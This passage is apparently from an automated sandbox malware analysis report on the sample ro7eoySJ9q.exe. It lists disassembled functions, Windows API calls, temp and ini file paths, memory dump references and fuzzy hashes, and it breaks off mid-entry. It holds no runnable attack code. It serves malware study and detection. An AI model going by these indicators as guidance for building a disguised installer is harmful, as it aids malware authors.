                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                        • String ID: %ls=%ls$NUL$[Rename]
                                                        • API String ID: 3756836283-899692902
                                                        • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                        • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                        • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                        • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                        • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                        • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                        • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                        Function 00405FDA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 0040603D
                                                        • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 00406051
                                                        • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 00406064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-2828742268
                                                        • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                        • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                        • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                        • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                        Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
                                                        • lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
                                                        • WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: ByteCharFileMultiWideWritelstrlen
                                                        • String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
                                                        • API String ID: 1453599865-1441359250
                                                        • Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                        • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                        • Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                        • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                        Function 00403FFC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                        • GetSysColor.USER32(00000000), ref: 00404035
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                        • SetBkMode.GDI32(?,?), ref: 0040404D
                                                        • GetSysColor.USER32(?), ref: 00404060
                                                        • SetBkColor.GDI32(?,?), ref: 00404070
                                                        • DeleteObject.GDI32(?), ref: 0040408A
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                        • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                        • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                        • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                        Function 0040274B Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                        • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                        • String ID:
                                                        • API String ID: 3294113728-0
                                                        • Opcode ID: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                        • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                        • Opcode Fuzzy Hash: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                        • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                        Function 004048C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                        • GetMessagePos.USER32 ref: 004048E7
                                                        • ScreenToClient.USER32(?,?), ref: 00404901
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                        • Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
                                                        • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                        • Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4
                                                        Function 00402C15 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                        • MulDiv.KERNEL32(001026CB,00000064,00102FB8), ref: 00402C5E
                                                        • wsprintfW.USER32 ref: 00402C6E
                                                        • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 00402C68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                        • Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
                                                        • Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                        • Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
                                                        Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D44
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                        • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Calibri
                                                        • API String ID: 3808545654-1409258342
                                                        • Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                        • Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
                                                        • Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                        • Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D
                                                        Function 00402571 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                        • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                          • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: FileRead$ByteCharMultiWidewsprintf
                                                        • String ID: 9
                                                        • API String ID: 3029736425-2366072709
                                                        • Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
